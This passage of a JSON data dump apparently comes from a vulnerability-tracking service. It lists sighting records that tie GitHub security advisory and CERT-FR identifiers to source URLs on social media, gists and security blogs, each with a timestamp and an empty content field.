"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38w6-vx8g-67pp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113986005583376363", "content": "", "creation_timestamp": "2025-02-11T15:40:16.013600Z"}, {"uuid": "aac722b0-f901-4125-abf0-cdc2287dd80e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pgc3-m5p5-4vc3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113986167652495803", "content": "", "creation_timestamp": "2025-02-11T16:21:28.887820Z"}, {"uuid": "efec6a63-f523-4270-a053-b56447770907", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67mh-4wv8-2f99", "type": "seen", "source": "https://gist.github.com/iamJakeRobbins/defef5643ea488f5b864b06ab463866f", "content": "", "creation_timestamp": "2025-03-11T22:39:27.000000Z"}, {"uuid": "1abc0207-8047-4836-8935-d6645d3a8174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54xq-cgqr-rpm3", "type": "seen", "source": "https://gist.github.com/iamJakeRobbins/defef5643ea488f5b864b06ab463866f", "content": "", "creation_timestamp": "2025-03-11T22:39:27.000000Z"}, {"uuid": "fac47cfe-e98d-4fb4-8037-aa2e16d1c551", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2c93-xxqg-54gm", "type": "seen", "source": "https://chaos.social/users/gsuberland/statuses/114202736244863531", "content": "", "creation_timestamp": "2025-03-21T22:17:45.348115Z"}, {"uuid": "292ae097-16c3-44a4-abcd-87eb8bd61e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mh63-6h87-95cp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114202990296478859", "content": "", "creation_timestamp": "2025-03-21T23:22:19.947633Z"}, {"uuid": "21835c31-6455-4d91-81d2-e36c830e5e81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wmxh-pxcx-9w24", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lk36kjm3gd2l", "content": "", "creation_timestamp": "2025-03-11T04:00:27.014025Z"}, {"uuid": "a8fac367-22e2-4182-8487-ca91a46b0d4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcrc-79hj-m3qh", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/113991073139943359", "content": "", "creation_timestamp": "2025-02-12T13:09:00.494121Z"}, {"uuid": "dd42ca3a-4de0-4a3e-88d4-71eb964c60a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r58q-66g9-h6g8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113997265751139169", "content": "", "creation_timestamp": "2025-02-13T15:23:52.529533Z"}, {"uuid": "93251367-8007-458d-bf60-c5e5bb6cca05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrqp-q7vx-v2cx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113997351988993753", "content": "", "creation_timestamp": "2025-02-13T15:45:48.274327Z"}, {"uuid": "1251e298-ce69-496d-bd63-6deea3f5c84a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c3p-chq6-q3j2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113997790515758268", "content": "", "creation_timestamp": "2025-02-13T17:37:20.024099Z"}, {"uuid": "91dc3946-072b-4019-9289-7feb1f87d267", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-933q-fx9h-5g46", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113997790534218207", "content": "", "creation_timestamp": "2025-02-13T17:37:20.147931Z"}, {"uuid": "eaae8268-8ca7-4e04-b2f4-4321f224786e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x8cx-3hq5-4wj9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113998796668998455", "content": "", "creation_timestamp": "2025-02-13T21:53:12.422306Z"}, {"uuid": "d09546b6-8606-4d91-b541-7021d3f22629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4v2-fvrv-qrf6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114180551137811517", "content": "", "creation_timestamp": "2025-03-18T00:15:46.747260Z"}, {"uuid": "121d0246-0b18-4022-8a27-f95eb065c214", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4vc4-m8qh-g8jm", "type": "seen", "source": "https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/", "content": "", "creation_timestamp": "2025-03-12T20:07:18.000000Z"}, {"uuid": "2f60116d-80b7-4cc3-9b31-f5bb5e7c32c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-754f-8gm6-c4r2", "type": "seen", "source": "https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/", "content": "", "creation_timestamp": "2025-03-12T20:07:18.000000Z"}, {"uuid": "291549b7-e83f-4f7b-a2bb-3de82a469681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-frxm-vm48-5qf2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114100218515671455", "content": "", "creation_timestamp": "2025-03-03T19:46:07.155054Z"}, {"uuid": "2c9f5802-0522-405e-ad41-f9868b194d24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fqxh-vfv5-8qjp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114100218515671455", "content": "", "creation_timestamp": "2025-03-03T19:46:07.317781Z"}, {"uuid": "cb5d288a-7d9c-4be3-85b5-f285462264ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "ghsa-93hq-5wgc-jc82", "type": "seen", "source": "https://gist.github.com/AsheshT/b8015f15c7f62ad003914be863360ef1", "content": "", "creation_timestamp": "2025-03-08T08:26:19.000000Z"}, {"uuid": "8caebcda-b0f5-4650-a42d-61cfc64ca70c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wpq5-3366-mqw4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114003891448459556", "content": "", "creation_timestamp": "2025-02-14T19:28:52.479896Z"}, {"uuid": "bcf9ba49-4166-4757-b164-98a0e2edf6ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m238-fmcw-wh58", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114003891483235545", "content": "", "creation_timestamp": "2025-02-14T19:28:53.110498Z"}, {"uuid": "1104148e-2417-47d9-8ce2-5921f4ccae0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x4c5-c7rf-jjgv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114003913812916358", "content": "", "creation_timestamp": "2025-02-14T19:34:33.749552Z"}, {"uuid": "3219e1f8-c531-4d4b-b91e-9ca203c68e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mp7w-mhcv-673j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114003913828136574", "content": "", "creation_timestamp": "2025-02-14T19:34:34.077782Z"}, {"uuid": "8dd75dfd-5c7c-4717-9d49-49ee79372834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h5c3-5r3r-rr8q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114003936399738557", "content": "", "creation_timestamp": "2025-02-14T19:40:18.338784Z"}, {"uuid": "1e56f621-7e26-4720-9c7c-ce30efa69b06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xx4v-prfh-6cgc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114003936414922745", "content": "", "creation_timestamp": "2025-02-14T19:40:19.515329Z"}, {"uuid": "dc1fd51e-6af1-4283-85b1-ee6ced7753e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rmvr-2pp2-xj38", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114003936429038682", "content": "", "creation_timestamp": "2025-02-14T19:40:19.659269Z"}, {"uuid": "550f5692-eba7-4eae-a5b2-6a86ecaac660", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2R7G-8HPC-RPQ9", "type": "seen", "source": "https://t.me/brutsecurity/2046", "content": "", "creation_timestamp": "2026-07-09T03:00:07.266657Z"}, {"uuid": "11213c87-0829-4c16-a878-345d4ffe3a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v39f-c9jj-8w7h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114077225711677534", "content": "", "creation_timestamp": "2025-02-27T18:18:44.539277Z"}, {"uuid": "817f3a8c-7bb7-4053-a251-4eb7f4ab80fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94h4-fj37-c825", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114077225711677534", "content": "", "creation_timestamp": "2025-02-27T18:18:44.684485Z"}, {"uuid": "03f0b300-47af-45f1-97b2-6bce61e1b8f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q9f5-625g-xm39", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114196115958327030", "content": "", "creation_timestamp": "2025-03-20T18:14:06.134221Z"}, {"uuid": "644526cd-3a27-43f2-b746-6583ca9d7a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-007", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lieuoqseb32v", "content": "", "creation_timestamp": "2025-02-17T13:40:05.568936Z"}, {"uuid": "359fd0eb-50aa-4660-8444-943fc8b4389b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-007", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114019506872026100", "content": "", "creation_timestamp": "2025-02-17T13:40:05.882102Z"}, {"uuid": "74ca4413-a232-4433-b04a-59fdf1264758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-007", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3liewwy2qf32z", "content": "", "creation_timestamp": "2025-02-17T14:20:29.240458Z"}, {"uuid": "70fd6f44-ca98-4647-baa8-431769747243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qr67-m6w9-wj3j", "type": "seen", "source": "https://bsky.app/profile/vulns.bsky.social/post/3lild2uy63n2q", "content": "", "creation_timestamp": "2025-02-20T03:13:23.312351Z"}, {"uuid": "34779df0-66d8-4075-8f7e-def36b908040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qr67-m6w9-wj3j", "type": "seen", "source": "https://bsky.app/profile/vulns.bsky.social/post/3lildxerujh24", "content": "", "creation_timestamp": "2025-02-20T03:29:19.705710Z"}, {"uuid": "a7cd97ef-26c3-49dc-b720-a22ae18f4fce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qr67-m6w9-wj3j", "type": "seen", "source": "https://bsky.app/profile/vulns.bsky.social/post/3lilewulsv22j", "content": "", "creation_timestamp": "2025-02-20T03:46:56.297876Z"}, {"uuid": "cff3dee5-ff95-4c42-9e0d-0ab1affc5c03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qr67-m6w9-wj3j", "type": "seen", "source": "https://bsky.app/profile/vulns.bsky.social/post/3lilf3eb5z32k", "content": "", "creation_timestamp": "2025-02-20T03:49:27.010326Z"}, {"uuid": "3d931780-c182-4a55-a585-d4aa0bc430fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vjh7-7g9h-fjfh", "type": "seen", "source": "https://bsky.app/profile/oracularhades.com/post/3limaobomek22", "content": "", "creation_timestamp": "2025-02-20T12:03:12.971000Z"}, {"uuid": "e0cc40ea-1d6a-442e-b04f-12f188783304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-693p-m996-3rmf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114156493377607996", "content": "", "creation_timestamp": "2025-03-13T18:17:33.283600Z"}, {"uuid": "5d04a8a6-db08-4d77-9b65-b248f1adc50d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-008", "type": "seen", "source": "https://bsky.app/profile/test-cvp.bsky.social/post/3ljzmwv6z532h", "content": "", "creation_timestamp": "2025-03-10T13:12:34.870300Z"}, {"uuid": "26a5f12a-1a5a-4dfa-91c8-73234363e346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "ghsa-93hq-5wgc-jc82", "type": "seen", "source": "https://gist.github.com/AsheshT/8cd4871fc35adf6c9c27adb10ca895ab", "content": "", "creation_timestamp": "2025-03-08T17:17:34.000000Z"}, {"uuid": "c4217390-5010-49a8-a983-3bd47ab258f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x3m8-f7g5-qhm7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114190269963714967", "content": "", "creation_timestamp": "2025-03-19T17:27:22.954061Z"}, {"uuid": "3553c14a-d5bb-42aa-8637-da0144a89fc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5pq7-52mg-hr42", "type": "seen", "source": "https://gist.github.com/saburi-pp/237b36513b29209ae31133136478b20e", "content": "", "creation_timestamp": "2025-03-04T05:49:27.000000Z"}, {"uuid": "455eada4-9b2c-4028-992a-19ec990a14d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-008", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3liwnkkioxa2g", "content": "", "creation_timestamp": "2025-02-24T15:20:23.829512Z"}, {"uuid": "53677029-3750-4d3a-b196-d051cc6da0e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38w6-vx8g-67pp", "type": "seen", "source": "https://bsky.app/profile/bsky.amase.xyz/post/3lj7oxwt34sq2", "content": "", "creation_timestamp": "2025-02-28T05:39:56.024137Z"}, {"uuid": "2693285e-ae5b-436f-8256-7b6b4c2731fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r8gc-qc2c-c7vh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114162131093338024", "content": "", "creation_timestamp": "2025-03-14T18:11:18.653967Z"}, {"uuid": "44d90a50-2469-4ede-b343-d972f42fdd90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q65w-fg65-79f4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114162131093338024", "content": "", "creation_timestamp": "2025-03-14T18:11:18.802921Z"}, {"uuid": "3acd2a01-2aa3-4e31-be90-9d72e978c383", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rwp7-7vc6-8477", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkea5pding2d", "content": "", "creation_timestamp": "2025-03-14T18:23:01.951240Z"}, {"uuid": "1e4d8812-f610-489f-9ff2-ecb330ca9bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p3x9-6h7p-cgfc", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkea5pjd6i23", "content": "", "creation_timestamp": "2025-03-14T18:23:02.653229Z"}, {"uuid": "696b522f-2c9e-40ed-9876-0eae12c117c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgf5-96fm-v528", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkea5pp6o62d", "content": "", "creation_timestamp": "2025-03-14T18:23:03.300774Z"}, {"uuid": "e3da3ee8-07df-4811-b44d-0bf9c3f48c46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3ll25kgjlwm2w", "content": "", "creation_timestamp": "2025-03-23T11:35:02.257470Z"}, {"uuid": "11e33c10-6d74-4ed7-a425-2b6acba2a99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "c3588e04-535d-427d-9a2d-83b0892ba943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g38c-wh3c-5h9r", "type": "seen", "source": "https://bsky.app/profile/tanfonto.wspanialy.eu.ap.brid.gy/post/3lltl6a4sptj2", "content": "", "creation_timestamp": "2025-04-02T14:16:10.663046Z"}, {"uuid": "c40c87ae-a555-4401-9eda-072c54ad59ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6q9c-pjw5-5rjm", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114711510570890314", "content": "", "creation_timestamp": "2025-06-19T18:45:44.202830Z"}, {"uuid": "2993a296-7ca7-4a95-be32-fa95f0ce97f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3ltjnxlzddf22", "content": "", "creation_timestamp": "2025-07-09T11:00:13.619379Z"}, {"uuid": "5d60fa16-4f90-4893-a72f-682edcaa2859", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/fb69a4cda9a7f0b4808b4f12ca5bb304", "content": "", "creation_timestamp": "2025-07-16T05:25:00.000000Z"}, {"uuid": "b0907d03-87c0-4769-acda-3284c4f30453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/fb69a4cda9a7f0b4808b4f12ca5bb304", "content": "", "creation_timestamp": "2025-07-16T05:25:00.000000Z"}, {"uuid": "ae082187-755c-44b1-98d5-8b178f721250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-26wh-cc3r-w6pj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270632021246470", "content": "", "creation_timestamp": "2025-04-02T22:04:31.159169Z"}, {"uuid": "1d354c2f-328f-460c-9e57-47d99959502b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-26wh-cc3r-w6pj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270632021246470", "content": "", "creation_timestamp": "2025-04-02T22:04:31.167950Z"}, {"uuid": "1049f011-e6b7-42c2-a2a8-a8b06a707954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c9pr-q8gx-3mgp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270641178668879", "content": "", "creation_timestamp": "2025-04-02T22:06:50.689178Z"}, {"uuid": "c66dd683-7dd9-449e-bcc1-5f7811f3451c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c9pr-q8gx-3mgp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270641178668879", "content": "", "creation_timestamp": "2025-04-02T22:06:50.693144Z"}, {"uuid": "a45b5b96-73d7-4f33-bbef-44d56fdda37e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m4h2-49xf-vq72", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270661068874157", "content": "", "creation_timestamp": "2025-04-02T22:11:54.223401Z"}, {"uuid": "f1c38084-6009-4a98-a016-b6189781f630", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m4h2-49xf-vq72", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270661068874157", "content": "", "creation_timestamp": "2025-04-02T22:11:54.218987Z"}, {"uuid": "2431a814-0442-4313-a098-dc05303f6f77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-223j-4rm8-mrmf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270672120502866", "content": "", "creation_timestamp": "2025-04-02T22:14:42.879371Z"}, {"uuid": "6366d888-64f9-48d2-858c-31bf6f968a75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-223j-4rm8-mrmf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114270672120502866", "content": "", "creation_timestamp": "2025-04-02T22:14:42.882260Z"}, {"uuid": "424367c2-c0c0-490b-854f-5e749885e0b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jxqq-cqm6-pfq9", "type": "seen", "source": "https://gist.github.com/shmil111/0a44cfb066f7a8de2e03f671c12f585f", "content": "", "creation_timestamp": "2025-04-03T02:06:20.000000Z"}, {"uuid": "fa6e9b5a-2a9f-4f52-b14e-f10e50ca792c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fvqr-27wr-82fm", "type": "seen", "source": "https://gist.github.com/shmil111/0a44cfb066f7a8de2e03f671c12f585f", "content": "", "creation_timestamp": "2025-04-03T02:06:20.000000Z"}, {"uuid": "4b5e3df2-aba6-4a2c-8c54-62842eb3c690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5rq-j2xg-h7qm", "type": "seen", "source": "https://gist.github.com/shmil111/0a44cfb066f7a8de2e03f671c12f585f", "content": "", "creation_timestamp": "2025-04-03T02:06:20.000000Z"}, {"uuid": "bab9b149-26cc-4c05-a160-e8c2587dcb95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35jh-r3h4-6jhm", "type": "seen", "source": "https://gist.github.com/shmil111/0a44cfb066f7a8de2e03f671c12f585f", "content": "", "creation_timestamp": "2025-04-03T02:06:20.000000Z"}, {"uuid": "9ac26dfd-fd40-4fd7-bd5b-9407f7dbf247", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29mw-wpgm-hmr9", "type": "seen", "source": "https://gist.github.com/shmil111/0a44cfb066f7a8de2e03f671c12f585f", "content": "", "creation_timestamp": "2025-04-03T02:06:20.000000Z"}, {"uuid": "295ef130-acec-4a03-9971-ba62f974700e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jf85-cpcp-j695", "type": "seen", "source": "https://gist.github.com/shmil111/0a44cfb066f7a8de2e03f671c12f585f", "content": "", "creation_timestamp": "2025-04-03T02:06:20.000000Z"}, {"uuid": "6ca67096-bd3f-45a9-9987-52ced60ef1f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xc9-xhrj-v574", "type": "seen", "source": "https://gist.github.com/shmil111/0a44cfb066f7a8de2e03f671c12f585f", "content": "", "creation_timestamp": "2025-04-03T02:06:20.000000Z"}, {"uuid": "8d1d18ca-5e57-42fb-b1d5-43e17739c802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 